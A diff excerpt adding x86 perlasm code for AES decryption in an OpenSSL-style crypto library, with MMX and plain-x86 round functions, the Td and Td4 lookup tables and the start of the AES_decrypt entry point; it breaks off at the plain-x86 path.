+		&pand	("mm3","mm2");		&pand	("mm7","mm2");
+		&paddb	("mm1","mm1");		&paddb	("mm5","mm5");
+		&pxor	("mm1","mm3");		&pxor	("mm5","mm7");	# tp4
+		&pshufw	("mm3","mm1",0xb1);	&pshufw	("mm7","mm5",0xb1);
+		&pxor	("mm0","mm1");		&pxor	("mm4","mm5");	# ^= tp4
+		&pxor	("mm0","mm3");		&pxor	("mm4","mm7");	# ^= ROTATE(tp4,16)	
+
+		&pxor	("mm3","mm3");		&pxor	("mm7","mm7");
+		&pcmpgtb("mm3","mm1");		&pcmpgtb("mm7","mm5");
+		&pand	("mm3","mm2");		&pand	("mm7","mm2");
+		&paddb	("mm1","mm1");		&paddb	("mm5","mm5");
+		&pxor	("mm1","mm3");		&pxor	("mm5","mm7");	# tp8
+		&pxor	("mm0","mm1");		&pxor	("mm4","mm5");	# ^= tp8
+		&movq	("mm3","mm1");		&movq	("mm7","mm5");
+		&pshufw	("mm2","mm1",0xb1);	&pshufw	("mm6","mm5",0xb1);
+		&pxor	("mm0","mm2");		&pxor	("mm4","mm6");	# ^= ROTATE(tp8,16)
+		&pslld	("mm1",8);		&pslld	("mm5",8);
+		&psrld	("mm3",8);		&psrld	("mm7",8);
+		&movq	("mm2",&QWP(0,$key));	&movq	("mm6",&QWP(8,$key));
+		&pxor	("mm0","mm1");		&pxor	("mm4","mm5");	# ^= tp8<<8
+		&pxor	("mm0","mm3");		&pxor	("mm4","mm7");	# ^= tp8>>8
+		&mov	($s0,&DWP(0-128,$tbl));
+		&pslld	("mm1",16);		&pslld	("mm5",16);
+		&mov	($s1,&DWP(64-128,$tbl));
+		&psrld	("mm3",16);		&psrld	("mm7",16);
+		&mov	($s2,&DWP(128-128,$tbl));
+		&pxor	("mm0","mm1");		&pxor	("mm4","mm5");	# ^= tp8<<24
+		&mov	($s3,&DWP(192-128,$tbl));
+		&pxor	("mm0","mm3");		&pxor	("mm4","mm7");	# ^= tp8>>24
+
+		&pxor	("mm0","mm2");		&pxor	("mm4","mm6");
+	&jmp	(&label("loop"));
+
+	&set_label("out",16);
+	&pxor	("mm0",&QWP(0,$key));
+	&pxor	("mm4",&QWP(8,$key));
+
+	&ret	();
+&function_end_B("_sse_AES_decrypt_compact");
+					}
+
+######################################################################
+# Vanilla block function.
+######################################################################
+
+sub decstep()
+{ my ($i,$td,@s) = @_;
+  my $tmp = $key;
+  my $out = $i==3?$s[0]:$acc;
+
+	# no instructions are reordered, as performance appears
+	# optimal... or rather that all attempts to reorder didn't
+	# result in better performance [which by the way is not a
+	# bit lower than ecryption].
+	if($i==3)   {	&mov	($key,$__key);			}
+	else        {	&mov	($out,$s[0]);			}
+			&and	($out,0xFF);
+			&mov	($out,&DWP(0,$td,$out,8));
+
+	if ($i==3)  {	$tmp=$s[1];				}
+			&movz	($tmp,&HB($s[1]));
+			&xor	($out,&DWP(3,$td,$tmp,8));
+
+	if ($i==3)  {	$tmp=$s[2]; &mov ($s[1],$acc);		}
+	else        {	&mov	($tmp,$s[2]);			}
+			&shr	($tmp,16);
+			&and	($tmp,0xFF);
+			&xor	($out,&DWP(2,$td,$tmp,8));
+
+	if ($i==3)  {	$tmp=$s[3]; &mov ($s[2],$__s1);		}
+	else        {	&mov	($tmp,$s[3]);			}
+			&shr	($tmp,24);
+			&xor	($out,&DWP(1,$td,$tmp,8));
+	if ($i<2)   {	&mov	(&DWP(4+4*$i,"esp"),$out);	}
+	if ($i==3)  {	&mov	($s[3],$__s0);			}
+			&comment();
+}
+
+sub declast()
+{ my ($i,$td,@s)=@_;
+  my $tmp = $key;
+  my $out = $i==3?$s[0]:$acc;
+
+	if($i==0)   {	&lea	($td,&DWP(2048+128,$td));
+			&mov	($tmp,&DWP(0-128,$td));
+			&mov	($acc,&DWP(32-128,$td));
+			&mov	($tmp,&DWP(64-128,$td));
+			&mov	($acc,&DWP(96-128,$td));
+			&mov	($tmp,&DWP(128-128,$td));
+			&mov	($acc,&DWP(160-128,$td));
+			&mov	($tmp,&DWP(192-128,$td));
+			&mov	($acc,&DWP(224-128,$td));
+			&lea	($td,&DWP(-128,$td));		}
+	if($i==3)   {	&mov	($key,$__key);			}
+	else        {	&mov	($out,$s[0]);			}
+			&and	($out,0xFF);
+			&movz	($out,&BP(0,$td,$out,1));
+
+	if ($i==3)  {	$tmp=$s[1];				}
+			&movz	($tmp,&HB($s[1]));
+			&movz	($tmp,&BP(0,$td,$tmp,1));
+			&shl	($tmp,8);
+			&xor	($out,$tmp);
+
+	if ($i==3)  {	$tmp=$s[2]; &mov ($s[1],$acc);		}
+	else        {	mov	($tmp,$s[2]);			}
+			&shr	($tmp,16);
+			&and	($tmp,0xFF);
+			&movz	($tmp,&BP(0,$td,$tmp,1));
+			&shl	($tmp,16);
+			&xor	($out,$tmp);
+
+	if ($i==3)  {	$tmp=$s[3]; &mov ($s[2],$__s1);		}
+	else        {	&mov	($tmp,$s[3]);			}
+			&shr	($tmp,24);
+			&movz	($tmp,&BP(0,$td,$tmp,1));
+			&shl	($tmp,24);
+			&xor	($out,$tmp);
+	if ($i<2)   {	&mov	(&DWP(4+4*$i,"esp"),$out);	}
+	if ($i==3)  {	&mov	($s[3],$__s0);
+			&lea	($td,&DWP(-2048,$td));		}
+}
+
+&function_begin_B("_x86_AES_decrypt");
+	# note that caller is expected to allocate stack frame for me!
+	&mov	($__key,$key);			# save key
+
+	&xor	($s0,&DWP(0,$key));		# xor with key
+	&xor	($s1,&DWP(4,$key));
+	&xor	($s2,&DWP(8,$key));
+	&xor	($s3,&DWP(12,$key));
+
+	&mov	($acc,&DWP(240,$key));		# load key->rounds
+
+	if ($small_footprint) {
+	    &lea	($acc,&DWP(-2,$acc,$acc));
+	    &lea	($acc,&DWP(0,$key,$acc,8));
+	    &mov	($__end,$acc);		# end of key schedule
+	    &set_label("loop",16);
+		&decstep(0,$tbl,$s0,$s3,$s2,$s1);
+		&decstep(1,$tbl,$s1,$s0,$s3,$s2);
+		&decstep(2,$tbl,$s2,$s1,$s0,$s3);
+		&decstep(3,$tbl,$s3,$s2,$s1,$s0);
+		&add	($key,16);		# advance rd_key
+		&xor	($s0,&DWP(0,$key));
+		&xor	($s1,&DWP(4,$key));
+		&xor	($s2,&DWP(8,$key));
+		&xor	($s3,&DWP(12,$key));
+	    &cmp	($key,$__end);
+	    &mov	($__key,$key);
+	    &jb		(&label("loop"));
+	}
+	else {
+	    &cmp	($acc,10);
+	    &jle	(&label("10rounds"));
+	    &cmp	($acc,12);
+	    &jle	(&label("12rounds"));
+
+	&set_label("14rounds",4);
+	    for ($i=1;$i<3;$i++) {
+		&decstep(0,$tbl,$s0,$s3,$s2,$s1);
+		&decstep(1,$tbl,$s1,$s0,$s3,$s2);
+		&decstep(2,$tbl,$s2,$s1,$s0,$s3);
+		&decstep(3,$tbl,$s3,$s2,$s1,$s0);
+		&xor	($s0,&DWP(16*$i+0,$key));
+		&xor	($s1,&DWP(16*$i+4,$key));
+		&xor	($s2,&DWP(16*$i+8,$key));
+		&xor	($s3,&DWP(16*$i+12,$key));
+	    }
+	    &add	($key,32);
+	    &mov	($__key,$key);		# advance rd_key
+	&set_label("12rounds",4);
+	    for ($i=1;$i<3;$i++) {
+		&decstep(0,$tbl,$s0,$s3,$s2,$s1);
+		&decstep(1,$tbl,$s1,$s0,$s3,$s2);
+		&decstep(2,$tbl,$s2,$s1,$s0,$s3);
+		&decstep(3,$tbl,$s3,$s2,$s1,$s0);
+		&xor	($s0,&DWP(16*$i+0,$key));
+		&xor	($s1,&DWP(16*$i+4,$key));
+		&xor	($s2,&DWP(16*$i+8,$key));
+		&xor	($s3,&DWP(16*$i+12,$key));
+	    }
+	    &add	($key,32);
+	    &mov	($__key,$key);		# advance rd_key
+	&set_label("10rounds",4);
+	    for ($i=1;$i<10;$i++) {
+		&decstep(0,$tbl,$s0,$s3,$s2,$s1);
+		&decstep(1,$tbl,$s1,$s0,$s3,$s2);
+		&decstep(2,$tbl,$s2,$s1,$s0,$s3);
+		&decstep(3,$tbl,$s3,$s2,$s1,$s0);
+		&xor	($s0,&DWP(16*$i+0,$key));
+		&xor	($s1,&DWP(16*$i+4,$key));
+		&xor	($s2,&DWP(16*$i+8,$key));
+		&xor	($s3,&DWP(16*$i+12,$key));
+	    }
+	}
+
+	&declast(0,$tbl,$s0,$s3,$s2,$s1);
+	&declast(1,$tbl,$s1,$s0,$s3,$s2);
+	&declast(2,$tbl,$s2,$s1,$s0,$s3);
+	&declast(3,$tbl,$s3,$s2,$s1,$s0);
+
+	&add	($key,$small_footprint?16:160);
+	&xor	($s0,&DWP(0,$key));
+	&xor	($s1,&DWP(4,$key));
+	&xor	($s2,&DWP(8,$key));
+	&xor	($s3,&DWP(12,$key));
+
+	&ret	();
+
+&set_label("AES_Td",64);	# Yes! I keep it in the code segment!
+	&_data_word(0x50a7f451, 0x5365417e, 0xc3a4171a, 0x965e273a);
+	&_data_word(0xcb6bab3b, 0xf1459d1f, 0xab58faac, 0x9303e34b);
+	&_data_word(0x55fa3020, 0xf66d76ad, 0x9176cc88, 0x254c02f5);
+	&_data_word(0xfcd7e54f, 0xd7cb2ac5, 0x80443526, 0x8fa362b5);
+	&_data_word(0x495ab1de, 0x671bba25, 0x980eea45, 0xe1c0fe5d);
+	&_data_word(0x02752fc3, 0x12f04c81, 0xa397468d, 0xc6f9d36b);
+	&_data_word(0xe75f8f03, 0x959c9215, 0xeb7a6dbf, 0xda595295);
+	&_data_word(0x2d83bed4, 0xd3217458, 0x2969e049, 0x44c8c98e);
+	&_data_word(0x6a89c275, 0x78798ef4, 0x6b3e5899, 0xdd71b927);
+	&_data_word(0xb64fe1be, 0x17ad88f0, 0x66ac20c9, 0xb43ace7d);
+	&_data_word(0x184adf63, 0x82311ae5, 0x60335197, 0x457f5362);
+	&_data_word(0xe07764b1, 0x84ae6bbb, 0x1ca081fe, 0x942b08f9);
+	&_data_word(0x58684870, 0x19fd458f, 0x876cde94, 0xb7f87b52);
+	&_data_word(0x23d373ab, 0xe2024b72, 0x578f1fe3, 0x2aab5566);
+	&_data_word(0x0728ebb2, 0x03c2b52f, 0x9a7bc586, 0xa50837d3);
+	&_data_word(0xf2872830, 0xb2a5bf23, 0xba6a0302, 0x5c8216ed);
+	&_data_word(0x2b1ccf8a, 0x92b479a7, 0xf0f207f3, 0xa1e2694e);
+	&_data_word(0xcdf4da65, 0xd5be0506, 0x1f6234d1, 0x8afea6c4);
+	&_data_word(0x9d532e34, 0xa055f3a2, 0x32e18a05, 0x75ebf6a4);
+	&_data_word(0x39ec830b, 0xaaef6040, 0x069f715e, 0x51106ebd);
+	&_data_word(0xf98a213e, 0x3d06dd96, 0xae053edd, 0x46bde64d);
+	&_data_word(0xb58d5491, 0x055dc471, 0x6fd40604, 0xff155060);
+	&_data_word(0x24fb9819, 0x97e9bdd6, 0xcc434089, 0x779ed967);
+	&_data_word(0xbd42e8b0, 0x888b8907, 0x385b19e7, 0xdbeec879);
+	&_data_word(0x470a7ca1, 0xe90f427c, 0xc91e84f8, 0x00000000);
+	&_data_word(0x83868009, 0x48ed2b32, 0xac70111e, 0x4e725a6c);
+	&_data_word(0xfbff0efd, 0x5638850f, 0x1ed5ae3d, 0x27392d36);
+	&_data_word(0x64d90f0a, 0x21a65c68, 0xd1545b9b, 0x3a2e3624);
+	&_data_word(0xb1670a0c, 0x0fe75793, 0xd296eeb4, 0x9e919b1b);
+	&_data_word(0x4fc5c080, 0xa220dc61, 0x694b775a, 0x161a121c);
+	&_data_word(0x0aba93e2, 0xe52aa0c0, 0x43e0223c, 0x1d171b12);
+	&_data_word(0x0b0d090e, 0xadc78bf2, 0xb9a8b62d, 0xc8a91e14);
+	&_data_word(0x8519f157, 0x4c0775af, 0xbbdd99ee, 0xfd607fa3);
+	&_data_word(0x9f2601f7, 0xbcf5725c, 0xc53b6644, 0x347efb5b);
+	&_data_word(0x7629438b, 0xdcc623cb, 0x68fcedb6, 0x63f1e4b8);
+	&_data_word(0xcadc31d7, 0x10856342, 0x40229713, 0x2011c684);
+	&_data_word(0x7d244a85, 0xf83dbbd2, 0x1132f9ae, 0x6da129c7);
+	&_data_word(0x4b2f9e1d, 0xf330b2dc, 0xec52860d, 0xd0e3c177);
+	&_data_word(0x6c16b32b, 0x99b970a9, 0xfa489411, 0x2264e947);
+	&_data_word(0xc48cfca8, 0x1a3ff0a0, 0xd82c7d56, 0xef903322);
+	&_data_word(0xc74e4987, 0xc1d138d9, 0xfea2ca8c, 0x360bd498);
+	&_data_word(0xcf81f5a6, 0x28de7aa5, 0x268eb7da, 0xa4bfad3f);
+	&_data_word(0xe49d3a2c, 0x0d927850, 0x9bcc5f6a, 0x62467e54);
+	&_data_word(0xc2138df6, 0xe8b8d890, 0x5ef7392e, 0xf5afc382);
+	&_data_word(0xbe805d9f, 0x7c93d069, 0xa92dd56f, 0xb31225cf);
+	&_data_word(0x3b99acc8, 0xa77d1810, 0x6e639ce8, 0x7bbb3bdb);
+	&_data_word(0x097826cd, 0xf418596e, 0x01b79aec, 0xa89a4f83);
+	&_data_word(0x656e95e6, 0x7ee6ffaa, 0x08cfbc21, 0xe6e815ef);
+	&_data_word(0xd99be7ba, 0xce366f4a, 0xd4099fea, 0xd67cb029);
+	&_data_word(0xafb2a431, 0x31233f2a, 0x3094a5c6, 0xc066a235);
+	&_data_word(0x37bc4e74, 0xa6ca82fc, 0xb0d090e0, 0x15d8a733);
+	&_data_word(0x4a9804f1, 0xf7daec41, 0x0e50cd7f, 0x2ff69117);
+	&_data_word(0x8dd64d76, 0x4db0ef43, 0x544daacc, 0xdf0496e4);
+	&_data_word(0xe3b5d19e, 0x1b886a4c, 0xb81f2cc1, 0x7f516546);
+	&_data_word(0x04ea5e9d, 0x5d358c01, 0x737487fa, 0x2e410bfb);
+	&_data_word(0x5a1d67b3, 0x52d2db92, 0x335610e9, 0x1347d66d);
+	&_data_word(0x8c61d79a, 0x7a0ca137, 0x8e14f859, 0x893c13eb);
+	&_data_word(0xee27a9ce, 0x35c961b7, 0xede51ce1, 0x3cb1477a);
+	&_data_word(0x59dfd29c, 0x3f73f255, 0x79ce1418, 0xbf37c773);
+	&_data_word(0xeacdf753, 0x5baafd5f, 0x146f3ddf, 0x86db4478);
+	&_data_word(0x81f3afca, 0x3ec468b9, 0x2c342438, 0x5f40a3c2);
+	&_data_word(0x72c31d16, 0x0c25e2bc, 0x8b493c28, 0x41950dff);
+	&_data_word(0x7101a839, 0xdeb30c08, 0x9ce4b4d8, 0x90c15664);
+	&_data_word(0x6184cb7b, 0x70b632d5, 0x745c6c48, 0x4257b8d0);
+
+#Td4:	# four copies of Td4 to choose from to avoid L1 aliasing
+	&data_byte(0x52, 0x09, 0x6a, 0xd5, 0x30, 0x36, 0xa5, 0x38);
+	&data_byte(0xbf, 0x40, 0xa3, 0x9e, 0x81, 0xf3, 0xd7, 0xfb);
+	&data_byte(0x7c, 0xe3, 0x39, 0x82, 0x9b, 0x2f, 0xff, 0x87);
+	&data_byte(0x34, 0x8e, 0x43, 0x44, 0xc4, 0xde, 0xe9, 0xcb);
+	&data_byte(0x54, 0x7b, 0x94, 0x32, 0xa6, 0xc2, 0x23, 0x3d);
+	&data_byte(0xee, 0x4c, 0x95, 0x0b, 0x42, 0xfa, 0xc3, 0x4e);
+	&data_byte(0x08, 0x2e, 0xa1, 0x66, 0x28, 0xd9, 0x24, 0xb2);
+	&data_byte(0x76, 0x5b, 0xa2, 0x49, 0x6d, 0x8b, 0xd1, 0x25);
+	&data_byte(0x72, 0xf8, 0xf6, 0x64, 0x86, 0x68, 0x98, 0x16);
+	&data_byte(0xd4, 0xa4, 0x5c, 0xcc, 0x5d, 0x65, 0xb6, 0x92);
+	&data_byte(0x6c, 0x70, 0x48, 0x50, 0xfd, 0xed, 0xb9, 0xda);
+	&data_byte(0x5e, 0x15, 0x46, 0x57, 0xa7, 0x8d, 0x9d, 0x84);
+	&data_byte(0x90, 0xd8, 0xab, 0x00, 0x8c, 0xbc, 0xd3, 0x0a);
+	&data_byte(0xf7, 0xe4, 0x58, 0x05, 0xb8, 0xb3, 0x45, 0x06);
+	&data_byte(0xd0, 0x2c, 0x1e, 0x8f, 0xca, 0x3f, 0x0f, 0x02);
+	&data_byte(0xc1, 0xaf, 0xbd, 0x03, 0x01, 0x13, 0x8a, 0x6b);
+	&data_byte(0x3a, 0x91, 0x11, 0x41, 0x4f, 0x67, 0xdc, 0xea);
+	&data_byte(0x97, 0xf2, 0xcf, 0xce, 0xf0, 0xb4, 0xe6, 0x73);
+	&data_byte(0x96, 0xac, 0x74, 0x22, 0xe7, 0xad, 0x35, 0x85);
+	&data_byte(0xe2, 0xf9, 0x37, 0xe8, 0x1c, 0x75, 0xdf, 0x6e);
+	&data_byte(0x47, 0xf1, 0x1a, 0x71, 0x1d, 0x29, 0xc5, 0x89);
+	&data_byte(0x6f, 0xb7, 0x62, 0x0e, 0xaa, 0x18, 0xbe, 0x1b);
+	&data_byte(0xfc, 0x56, 0x3e, 0x4b, 0xc6, 0xd2, 0x79, 0x20);
+	&data_byte(0x9a, 0xdb, 0xc0, 0xfe, 0x78, 0xcd, 0x5a, 0xf4);
+	&data_byte(0x1f, 0xdd, 0xa8, 0x33, 0x88, 0x07, 0xc7, 0x31);
+	&data_byte(0xb1, 0x12, 0x10, 0x59, 0x27, 0x80, 0xec, 0x5f);
+	&data_byte(0x60, 0x51, 0x7f, 0xa9, 0x19, 0xb5, 0x4a, 0x0d);
+	&data_byte(0x2d, 0xe5, 0x7a, 0x9f, 0x93, 0xc9, 0x9c, 0xef);
+	&data_byte(0xa0, 0xe0, 0x3b, 0x4d, 0xae, 0x2a, 0xf5, 0xb0);
+	&data_byte(0xc8, 0xeb, 0xbb, 0x3c, 0x83, 0x53, 0x99, 0x61);
+	&data_byte(0x17, 0x2b, 0x04, 0x7e, 0xba, 0x77, 0xd6, 0x26);
+	&data_byte(0xe1, 0x69, 0x14, 0x63, 0x55, 0x21, 0x0c, 0x7d);
+
+	&data_byte(0x52, 0x09, 0x6a, 0xd5, 0x30, 0x36, 0xa5, 0x38);
+	&data_byte(0xbf, 0x40, 0xa3, 0x9e, 0x81, 0xf3, 0xd7, 0xfb);
+	&data_byte(0x7c, 0xe3, 0x39, 0x82, 0x9b, 0x2f, 0xff, 0x87);
+	&data_byte(0x34, 0x8e, 0x43, 0x44, 0xc4, 0xde, 0xe9, 0xcb);
+	&data_byte(0x54, 0x7b, 0x94, 0x32, 0xa6, 0xc2, 0x23, 0x3d);
+	&data_byte(0xee, 0x4c, 0x95, 0x0b, 0x42, 0xfa, 0xc3, 0x4e);
+	&data_byte(0x08, 0x2e, 0xa1, 0x66, 0x28, 0xd9, 0x24, 0xb2);
+	&data_byte(0x76, 0x5b, 0xa2, 0x49, 0x6d, 0x8b, 0xd1, 0x25);
+	&data_byte(0x72, 0xf8, 0xf6, 0x64, 0x86, 0x68, 0x98, 0x16);
+	&data_byte(0xd4, 0xa4, 0x5c, 0xcc, 0x5d, 0x65, 0xb6, 0x92);
+	&data_byte(0x6c, 0x70, 0x48, 0x50, 0xfd, 0xed, 0xb9, 0xda);
+	&data_byte(0x5e, 0x15, 0x46, 0x57, 0xa7, 0x8d, 0x9d, 0x84);
+	&data_byte(0x90, 0xd8, 0xab, 0x00, 0x8c, 0xbc, 0xd3, 0x0a);
+	&data_byte(0xf7, 0xe4, 0x58, 0x05, 0xb8, 0xb3, 0x45, 0x06);
+	&data_byte(0xd0, 0x2c, 0x1e, 0x8f, 0xca, 0x3f, 0x0f, 0x02);
+	&data_byte(0xc1, 0xaf, 0xbd, 0x03, 0x01, 0x13, 0x8a, 0x6b);
+	&data_byte(0x3a, 0x91, 0x11, 0x41, 0x4f, 0x67, 0xdc, 0xea);
+	&data_byte(0x97, 0xf2, 0xcf, 0xce, 0xf0, 0xb4, 0xe6, 0x73);
+	&data_byte(0x96, 0xac, 0x74, 0x22, 0xe7, 0xad, 0x35, 0x85);
+	&data_byte(0xe2, 0xf9, 0x37, 0xe8, 0x1c, 0x75, 0xdf, 0x6e);
+	&data_byte(0x47, 0xf1, 0x1a, 0x71, 0x1d, 0x29, 0xc5, 0x89);
+	&data_byte(0x6f, 0xb7, 0x62, 0x0e, 0xaa, 0x18, 0xbe, 0x1b);
+	&data_byte(0xfc, 0x56, 0x3e, 0x4b, 0xc6, 0xd2, 0x79, 0x20);
+	&data_byte(0x9a, 0xdb, 0xc0, 0xfe, 0x78, 0xcd, 0x5a, 0xf4);
+	&data_byte(0x1f, 0xdd, 0xa8, 0x33, 0x88, 0x07, 0xc7, 0x31);
+	&data_byte(0xb1, 0x12, 0x10, 0x59, 0x27, 0x80, 0xec, 0x5f);
+	&data_byte(0x60, 0x51, 0x7f, 0xa9, 0x19, 0xb5, 0x4a, 0x0d);
+	&data_byte(0x2d, 0xe5, 0x7a, 0x9f, 0x93, 0xc9, 0x9c, 0xef);
+	&data_byte(0xa0, 0xe0, 0x3b, 0x4d, 0xae, 0x2a, 0xf5, 0xb0);
+	&data_byte(0xc8, 0xeb, 0xbb, 0x3c, 0x83, 0x53, 0x99, 0x61);
+	&data_byte(0x17, 0x2b, 0x04, 0x7e, 0xba, 0x77, 0xd6, 0x26);
+	&data_byte(0xe1, 0x69, 0x14, 0x63, 0x55, 0x21, 0x0c, 0x7d);
+
+	&data_byte(0x52, 0x09, 0x6a, 0xd5, 0x30, 0x36, 0xa5, 0x38);
+	&data_byte(0xbf, 0x40, 0xa3, 0x9e, 0x81, 0xf3, 0xd7, 0xfb);
+	&data_byte(0x7c, 0xe3, 0x39, 0x82, 0x9b, 0x2f, 0xff, 0x87);
+	&data_byte(0x34, 0x8e, 0x43, 0x44, 0xc4, 0xde, 0xe9, 0xcb);
+	&data_byte(0x54, 0x7b, 0x94, 0x32, 0xa6, 0xc2, 0x23, 0x3d);
+	&data_byte(0xee, 0x4c, 0x95, 0x0b, 0x42, 0xfa, 0xc3, 0x4e);
+	&data_byte(0x08, 0x2e, 0xa1, 0x66, 0x28, 0xd9, 0x24, 0xb2);
+	&data_byte(0x76, 0x5b, 0xa2, 0x49, 0x6d, 0x8b, 0xd1, 0x25);
+	&data_byte(0x72, 0xf8, 0xf6, 0x64, 0x86, 0x68, 0x98, 0x16);
+	&data_byte(0xd4, 0xa4, 0x5c, 0xcc, 0x5d, 0x65, 0xb6, 0x92);
+	&data_byte(0x6c, 0x70, 0x48, 0x50, 0xfd, 0xed, 0xb9, 0xda);
+	&data_byte(0x5e, 0x15, 0x46, 0x57, 0xa7, 0x8d, 0x9d, 0x84);
+	&data_byte(0x90, 0xd8, 0xab, 0x00, 0x8c, 0xbc, 0xd3, 0x0a);
+	&data_byte(0xf7, 0xe4, 0x58, 0x05, 0xb8, 0xb3, 0x45, 0x06);
+	&data_byte(0xd0, 0x2c, 0x1e, 0x8f, 0xca, 0x3f, 0x0f, 0x02);
+	&data_byte(0xc1, 0xaf, 0xbd, 0x03, 0x01, 0x13, 0x8a, 0x6b);
+	&data_byte(0x3a, 0x91, 0x11, 0x41, 0x4f, 0x67, 0xdc, 0xea);
+	&data_byte(0x97, 0xf2, 0xcf, 0xce, 0xf0, 0xb4, 0xe6, 0x73);
+	&data_byte(0x96, 0xac, 0x74, 0x22, 0xe7, 0xad, 0x35, 0x85);
+	&data_byte(0xe2, 0xf9, 0x37, 0xe8, 0x1c, 0x75, 0xdf, 0x6e);
+	&data_byte(0x47, 0xf1, 0x1a, 0x71, 0x1d, 0x29, 0xc5, 0x89);
+	&data_byte(0x6f, 0xb7, 0x62, 0x0e, 0xaa, 0x18, 0xbe, 0x1b);
+	&data_byte(0xfc, 0x56, 0x3e, 0x4b, 0xc6, 0xd2, 0x79, 0x20);
+	&data_byte(0x9a, 0xdb, 0xc0, 0xfe, 0x78, 0xcd, 0x5a, 0xf4);
+	&data_byte(0x1f, 0xdd, 0xa8, 0x33, 0x88, 0x07, 0xc7, 0x31);
+	&data_byte(0xb1, 0x12, 0x10, 0x59, 0x27, 0x80, 0xec, 0x5f);
+	&data_byte(0x60, 0x51, 0x7f, 0xa9, 0x19, 0xb5, 0x4a, 0x0d);
+	&data_byte(0x2d, 0xe5, 0x7a, 0x9f, 0x93, 0xc9, 0x9c, 0xef);
+	&data_byte(0xa0, 0xe0, 0x3b, 0x4d, 0xae, 0x2a, 0xf5, 0xb0);
+	&data_byte(0xc8, 0xeb, 0xbb, 0x3c, 0x83, 0x53, 0x99, 0x61);
+	&data_byte(0x17, 0x2b, 0x04, 0x7e, 0xba, 0x77, 0xd6, 0x26);
+	&data_byte(0xe1, 0x69, 0x14, 0x63, 0x55, 0x21, 0x0c, 0x7d);
+
+	&data_byte(0x52, 0x09, 0x6a, 0xd5, 0x30, 0x36, 0xa5, 0x38);
+	&data_byte(0xbf, 0x40, 0xa3, 0x9e, 0x81, 0xf3, 0xd7, 0xfb);
+	&data_byte(0x7c, 0xe3, 0x39, 0x82, 0x9b, 0x2f, 0xff, 0x87);
+	&data_byte(0x34, 0x8e, 0x43, 0x44, 0xc4, 0xde, 0xe9, 0xcb);
+	&data_byte(0x54, 0x7b, 0x94, 0x32, 0xa6, 0xc2, 0x23, 0x3d);
+	&data_byte(0xee, 0x4c, 0x95, 0x0b, 0x42, 0xfa, 0xc3, 0x4e);
+	&data_byte(0x08, 0x2e, 0xa1, 0x66, 0x28, 0xd9, 0x24, 0xb2);
+	&data_byte(0x76, 0x5b, 0xa2, 0x49, 0x6d, 0x8b, 0xd1, 0x25);
+	&data_byte(0x72, 0xf8, 0xf6, 0x64, 0x86, 0x68, 0x98, 0x16);
+	&data_byte(0xd4, 0xa4, 0x5c, 0xcc, 0x5d, 0x65, 0xb6, 0x92);
+	&data_byte(0x6c, 0x70, 0x48, 0x50, 0xfd, 0xed, 0xb9, 0xda);
+	&data_byte(0x5e, 0x15, 0x46, 0x57, 0xa7, 0x8d, 0x9d, 0x84);
+	&data_byte(0x90, 0xd8, 0xab, 0x00, 0x8c, 0xbc, 0xd3, 0x0a);
+	&data_byte(0xf7, 0xe4, 0x58, 0x05, 0xb8, 0xb3, 0x45, 0x06);
+	&data_byte(0xd0, 0x2c, 0x1e, 0x8f, 0xca, 0x3f, 0x0f, 0x02);
+	&data_byte(0xc1, 0xaf, 0xbd, 0x03, 0x01, 0x13, 0x8a, 0x6b);
+	&data_byte(0x3a, 0x91, 0x11, 0x41, 0x4f, 0x67, 0xdc, 0xea);
+	&data_byte(0x97, 0xf2, 0xcf, 0xce, 0xf0, 0xb4, 0xe6, 0x73);
+	&data_byte(0x96, 0xac, 0x74, 0x22, 0xe7, 0xad, 0x35, 0x85);
+	&data_byte(0xe2, 0xf9, 0x37, 0xe8, 0x1c, 0x75, 0xdf, 0x6e);
+	&data_byte(0x47, 0xf1, 0x1a, 0x71, 0x1d, 0x29, 0xc5, 0x89);
+	&data_byte(0x6f, 0xb7, 0x62, 0x0e, 0xaa, 0x18, 0xbe, 0x1b);
+	&data_byte(0xfc, 0x56, 0x3e, 0x4b, 0xc6, 0xd2, 0x79, 0x20);
+	&data_byte(0x9a, 0xdb, 0xc0, 0xfe, 0x78, 0xcd, 0x5a, 0xf4);
+	&data_byte(0x1f, 0xdd, 0xa8, 0x33, 0x88, 0x07, 0xc7, 0x31);
+	&data_byte(0xb1, 0x12, 0x10, 0x59, 0x27, 0x80, 0xec, 0x5f);
+	&data_byte(0x60, 0x51, 0x7f, 0xa9, 0x19, 0xb5, 0x4a, 0x0d);
+	&data_byte(0x2d, 0xe5, 0x7a, 0x9f, 0x93, 0xc9, 0x9c, 0xef);
+	&data_byte(0xa0, 0xe0, 0x3b, 0x4d, 0xae, 0x2a, 0xf5, 0xb0);
+	&data_byte(0xc8, 0xeb, 0xbb, 0x3c, 0x83, 0x53, 0x99, 0x61);
+	&data_byte(0x17, 0x2b, 0x04, 0x7e, 0xba, 0x77, 0xd6, 0x26);
+	&data_byte(0xe1, 0x69, 0x14, 0x63, 0x55, 0x21, 0x0c, 0x7d);
+&function_end_B("_x86_AES_decrypt");
+
+# void AES_decrypt (const void *inp,void *out,const AES_KEY *key);
+&function_begin("AES_decrypt");
+	&mov	($acc,&wparam(0));		# load inp
+	&mov	($key,&wparam(2));		# load key
+
+	&mov	($s0,"esp");
+	&sub	("esp",36);
+	&and	("esp",-64);			# align to cache-line
+
+	# place stack frame just "above" the key schedule
+	&lea	($s1,&DWP(-64-63,$key));
+	&sub	($s1,"esp");
+	&neg	($s1);
+	&and	($s1,0x3C0);	# modulo 1024, but aligned to cache-line
+	&sub	("esp",$s1);
+	&add	("esp",4);	# 4 is reserved for caller's return address
+	&mov	($_esp,$s0);	# save stack pointer
+
+	&call   (&label("pic_point"));          # make it PIC!
+	&set_label("pic_point");
+	&blindpop($tbl);
+	&picmeup($s0,"OPENSSL_ia32cap_P",$tbl,&label("pic_point")) if(!$x86only);
+	&lea    ($tbl,&DWP(&label("AES_Td")."-".&label("pic_point"),$tbl));
+
+	# pick Td4 copy which can't "overlap" with stack frame or key schedule
+	&lea	($s1,&DWP(768-4,"esp"));
+	&sub	($s1,$tbl);
+	&and	($s1,0x300);
+	&lea	($tbl,&DWP(2048+128,$tbl,$s1));
+
+					if (!$x86only) {
+	&bt	(&DWP(0,$s0),25);	# check for SSE bit
+	&jnc	(&label("x86"));
+
+	&movq	("mm0",&QWP(0,$acc));
+	&movq	("mm4",&QWP(8,$acc));
+	&call	("_sse_AES_decrypt_compact");
+	&mov	("esp",$_esp);			# restore stack pointer
+	&mov	($acc,&wparam(1));		# load out
+	&movq	(&QWP(0,$acc),"mm0");		# write output data
+	&movq	(&QWP(8,$acc),"mm4");
+	&emms	();
+	&function_end_A();
+					}
+	&set_label("x86",16);
